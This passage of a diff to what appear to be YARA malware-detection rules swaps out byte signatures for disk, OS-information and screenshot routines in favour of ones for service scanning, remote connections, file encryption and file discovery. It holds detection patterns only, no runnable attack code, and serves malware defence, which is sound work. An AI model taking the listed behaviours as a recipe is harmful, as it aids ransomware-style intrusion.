-            ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ?? ?? ?? ?? 0F BA
-            F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 03 CA 48 8B
-            50 ?? FF 10 0F 28 CE 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 63 48 ?? 8B 84 0C ??
-            ?? ?? ?? 0F BA F0 ?? 0F BA E8 ?? 89 84 0C ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 63 51 ?? 48 8D 8C 24 ?? ?? ?? ??
-            48 03 CA 48 8B 50 ?? FF 10 0F 28 CF 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 44 24 ?? 4D 8B
-            CD 4C 89 6C 24 ?? 41 BA ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? C6 44 24 ?? ?? 41 0F BA
-        }
-		$get_disk_information_p6 = {
-            EC ?? 44 89 64 24 ?? 33 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B 8C 24
-            ?? ?? ?? ?? 8B C1 24 ?? 3C ?? 74 ?? 48 8B 84 24 ?? ?? ?? ?? 4C 8B 00 4D 85 C0 74 ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B 10 4C 3B 84 24 ?? ?? ?? ?? 4C 0F 42 84 24 ?? ?? ?? ??
-            4C 2B C2 EB ?? F6 C1 ?? 75 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 8B 10 48 8B 84 24 ?? ?? ?? ?? 4C 63 00 4C 2B C2 4C 03 C1 EB ??
-            4C 8B 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 0F BA F4 ?? 41 83 CC ?? 44 89 64
-            24 ?? 48 8D 54 24 ?? 49 83 FA ?? 48 0F 47 54 24 ?? 4D 8B C1 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ??
-            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
-            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48
-            8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48
-            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 0F B6 44 24 ?? FE C0 8B B4 24
-        }
-		$get_os_information_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 48 89 4C 24 ??
-            33 F6 89 74 24 ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F
-            84 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 4C 24 ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ??
-            E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44
-            24 ?? 45 33 C9 45 33 C0 8B 54 24 ?? 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 48 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ?? E8 ?? ??
-            ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 54 24 ?? EB ?? 48
-        }
-		$get_os_information_p2 = {
-            8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 07 48 89 77
-            ?? 48 C7 47 ?? ?? ?? ?? ?? 66 89 37 C7 44 24 ?? ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 8B
-            C1 24 ?? 3C ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 10 48 85 D2 74 ?? 48 8B 85 ?? ?? ??
-            ?? 4C 8B 08 48 3B 95 ?? ?? ?? ?? 48 0F 42 95 ?? ?? ?? ?? 49 2B D1 EB ?? F6 C1 ?? 75
-            ?? 48 8B 85 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B 85 ?? ?? ?? ?? 4C 8B 08 48 8B
-            85 ?? ?? ?? ?? 48 63 10 48 03 D2 49 2B D1 48 03 D1 49 8B C1 48 D1 FA 48 85 C0 74 ??
-            48 8B CF 48 83 FA ?? 77 ?? 48 89 57 ?? 48 8D 1C 12 4C 8B C3 49 8B D1 E8 ?? ?? ?? ??
-            66 89 34 3B EB ?? E8 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C7 48
-            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 5D C3
-        }
-		$take_screenshot_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 8B FA 33 DB 48 8B 05 ?? ?? ?? ?? 48
-            89 84 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 4C 8B F8 48 89 84 24 ?? ?? ?? ?? 48 8B
-            C8 FF 15 ?? ?? ?? ?? 48 8B F0 48 89 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 BC
-            ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 44 8B A4 24 ?? ?? ?? ?? 44 8B AC 24 ?? ?? ?? ?? 45 8B C5 41 8B
-            D4 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 89 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 4C 89 7C 24 ?? 44 89 6C 24 ??
-            45 8B CC 45 33 C0 33 D2 48 8B CE FF 15 ?? ?? ?? ?? 8B CF 41 0F AF CC B8 ?? ?? ?? ??
-            F7 E9 44 8B F2 41 D1 FE 41 8B CE C1 E9 ?? 44 03 F1 41 0F AF FD B8 ?? ?? ?? ?? F7 EF
-            8B F2 D1 FE 8B C6 C1 E8 ?? 03 F0 44 8B C6 41 8B D6 49 8B CF FF 15 ?? ?? ?? ?? 4C 8B
-            F8 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 49 8B D7 48 8B C8 FF 15 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 44 89 64 24 ?? 89 5C 24 ?? 89 5C 24 ??
-            48 8B 44 24 ?? 48 89 44 24 ?? 89 74 24 ?? 45 8B CE 45 33 C0 33 D2 48 8B CF FF 15 ??
-            ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ??
-            ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 89 9C 24 ??
-            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 8D 48 ?? FF 15 ?? ?? ??
-            ?? FF 47 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ?? 90 4C 89 BC 24 ?? ?? ?? ?? 4C 8D 84 24 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C6 84
-        }
-		$take_screenshot_p2 = {
-            24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ??
-            45 8B C8 41 F7 D9 45 0F 48 C8 44 89 8C 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? 0F AF C1 83 C0 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? C1 E0 ?? 89 84 24 ?? ??
-            ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 45 85 C0 7E ?? 41 8D 49 ?? 0F
-            AF C8 48 63 D1 49 03 D2 48 89 94 24 ?? ?? ?? ?? F7 D8 89 84 24 ?? ?? ?? ?? EB ?? C6
-            84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ??
-            ?? 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            48 89 9C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
-            ?? ?? 48 8B 01 45 33 C0 48 8D 94 24 ?? ?? ?? ?? FF 50 ?? 44 8B A4 24 ?? ?? ?? ?? 48
-            8B 8C 24 ?? ?? ?? ?? 48 8B 01 45 33 C9 45 33 C0 48 8B D3 FF 50 ?? 41 8B CC E8 ?? ??
-            ?? ?? 4C 8B E8 89 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 01 4C 8D 8C 24 ??
-            ?? ?? ?? 45 8B C4 49 8B D5 FF 50 ?? 4C 8D 8C 24 ?? ?? ?? ?? 45 8B C4 0F 1F 40 ?? 66
-            0F 1F 84 00 ?? ?? 00 00 49 FF C9 B8 ?? ?? ?? ?? 41 F7 E0 C1 EA ?? 0F B6 C2 C0 E0 ??
-            8D 0C 10 02 C9 44 2A C1 41 80 C0 ?? 45 88 01 44 8B C2 85 D2 75 ?? 4C 8D 84 24 ?? ??
-            ?? ?? 49 8B D1 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8B 44 24 ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B C1 49 2B C0 4C 8D 35 ?? ?? ?? ?? 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 49 8D 40 ??
-            48 89 44 24 ?? 48 8D 7C 24 ?? 48 83 F9 ?? 48 0F 47 7C 24 ?? 48 8D 05 ?? ?? ?? ?? 48
-            3B C7 76 ?? 4A 8D 04 07 4C 3B F0 77 ?? BE ?? ?? ?? ?? 49 3B FE 77 ?? 4C 8B FB EB
-        }
-		$take_screenshot_p3 = {
-            4C 8B FF 4D 2B FE EB ?? BE ?? ?? ?? ?? 44 8B FE 48 8D 4F ?? 49 FF C0 48 8B D7 E8 ??
-            ?? ?? ?? 4D 8B C7 49 8B D6 48 8B CF E8 ?? ?? ?? ?? 4A 8D 0C 3F 49 2B F7 49 8D 56 ??
-            49 03 D7 4C 8B C6 E8 ?? ?? ?? ?? 48 8D 44 24 ?? EB ?? BE ?? ?? ?? ?? 48 89 74 24 ??
-            4C 89 74 24 ?? 8B D6 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ??
-            48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F
-            10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 48 89 58 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 48 8B
-            94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ?? ??
-            48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C3 4C 8B 8C 24
-            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 4D 85 C9 0F 84 ?? ?? ??
-            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
-            0F BE 0C 01 81 F9 ?? ?? ?? ?? 73 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
-            80 3C 01 ?? 74 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 80 3C 01 ?? 74 ??
-            48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 48 8D 94 24 ?? ?? ?? ?? 48 83 BC 24
-            ?? ?? ?? ?? ?? 48 0F 47 94 24 ?? ?? ?? ?? 0F B6 0C 01 80 F1 ?? 88 0C 02 48 8B 94 24
-            ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 FF C0 49 3B C1 0F 82
-            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 49 8B C0 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 4D 8B 40 ?? 49 2B C0 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 49 8B C8 E8 ?? ??
-            ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 8C 24 ?? ?? ?? ?? 0F 11
-        }
-		$take_screenshot_p4 = {
-            8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 66 49 0F 7E C1 66 0F 73 D9 ?? 66 48 0F 7E
-            C8 48 83 F8 ?? 49 0F 47 D1 45 33 C9 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 8B C4 49 8B D5 48 8B 8C 24
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B 01 FF 50 ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 4C 24 ??
-            FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ??
-            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ??
-            48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
-            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B F8 48 8D 48 ?? FF 15 ?? ?? ?? ?? 83 6F ?? ?? 75 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ??
-            48 8B 0F 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 48 89 1F 48 8D 4F ?? FF 15 ?? ?? ?? ?? 48
-            8D 4F ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D
-            9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5F C3
-        }
+		$scan_for_services = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73
+            ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66
+            89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03
+            F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ??
+            ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B
+            FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ??
+            ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66
+            01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8
+      }
+		$remote_connection = {
+            8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4
+            ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55
+            56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8
+            ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
+            47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4
+            ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ??
+            8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B
+            74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF
+            78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ??
+            ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B
+            83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D
+            8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D
+            44 24 ?? 50 E8
+      }
+		$encrypt_files = {
+            81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
+            8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ??
+            ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D
+            94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ??
+            ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
+            E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ??
+            8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D
+            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52
+            E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D
+            54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24
+            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D
+            44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85
+            FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+      }
+		$find_files = {
+            83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ??
+            ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ??
+            8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ??
+            ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ??
+            ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
+            ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
